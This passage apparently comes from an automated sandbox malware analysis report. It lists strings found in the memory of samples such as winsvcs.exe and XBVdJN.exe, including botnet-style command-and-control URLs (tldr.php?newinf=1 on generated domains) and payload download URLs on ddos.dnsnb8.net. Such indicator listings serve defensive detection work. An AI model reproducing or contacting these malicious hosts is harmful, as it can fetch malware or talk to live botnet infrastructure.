00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.com/tldr.php?newinf=1jk
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.in/tldr.php?newinf=1#h?
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.net/tldr.php?newinf=1jA
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://afeifieuuufufufuf.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://afeifieuuufufufuf.su/tldr.php?newinf=1fo
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1X
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.com/tldr.php?newinf=1v
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.net/tldr.php?newinf=10B%
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.su/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.su/tldr.php?newinf=1C0
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aiiaiafrzrueuedur.su/tldr.php?newinf=1Y0
        Source: XBVdJN.exe, 00000001.00000003.2333200622.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=
        Source: XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarBk
        Source: XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarC:
        Source: XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rark8
        Source: XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
        Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar/
        Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar88
        Source: XBVdJN.exe, 00000001.00000002.2443779736.0000000002D5A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarGp
        Source: XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarWindows
        Source: XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarb
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rareC:
        Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh?p
        Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars?
        Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarv8
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar1
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar:
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarw
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarDC:
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarT
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.com/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.com/tldr.php?newinf=1
